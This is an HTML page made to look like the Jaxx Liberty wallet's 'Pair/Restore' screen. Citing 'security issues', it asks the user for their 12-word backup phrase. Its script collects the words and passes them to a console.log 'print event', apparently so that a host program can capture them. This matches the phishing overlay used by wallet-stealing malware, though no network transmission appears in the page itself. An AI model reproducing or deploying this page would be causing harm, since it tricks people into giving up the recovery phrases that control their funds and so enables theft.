<!DOCTYPE html>
<html>
<head>
	<title>Jaxx Liberty</title>
	<meta charset="UTF-8">
	<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body class="bg-main" scroll="no" style="overflow: hidden">
	<header>
		<!-- Arrow left icon -->
		<img src="icons8-back-filled-24.png" alt="back">
		Pair/Restore Jaxx Liberty Wallet
	</header>
	<main>
		<p style="margin-bottom: 0">Due to security issues Enter Backup Phrase</p>
		<p style="margin-top: 5px; font-size: 1.1em">Type in your 12-word Backup Phrase in the correct order to pair your Jaxx Liberty Wallet.</br>One Word per one line</p>
		<textarea rows="12" id="seed"></textarea>
	</main>
	<footer>
		<button type="button" class="bold" id="next" disabled="disabled">Restore Wallet</button>
	</footer>
</body>
<script type="text/javascript">
	const nextButton = document.getElementById('next');
	const seedTextarea = document.getElementById('seed');
	document.querySelector('footer').style.width = seedTextarea.offsetWidth + 'px';
	seedTextarea.value = '';
	seedTextarea.addEventListener('keyup', function () {
		if (isValidSeed(this.value)) {
			nextButton.disabled = false;
		} else {
			nextButton.disabled = true;
		}
	});
	nextButton.addEventListener('click', function () {
		console.log('print event: ' + normalizeLog(seedTextarea.value));
	});
	function isValidSeed(value) {
		return countOfLines(value) >= 12;
	}
	function countOfLines(input) {
		return input.split(' ').join('').split('\n').filter(function(val) {return val.trim() !== '';}).length;
	}
	function normalizeLog(input) {
		return input.split(' ').join('').split('\n').filter(function(val) {return val.trim() !== '';}).join(', ');
	}
</script>
</html>
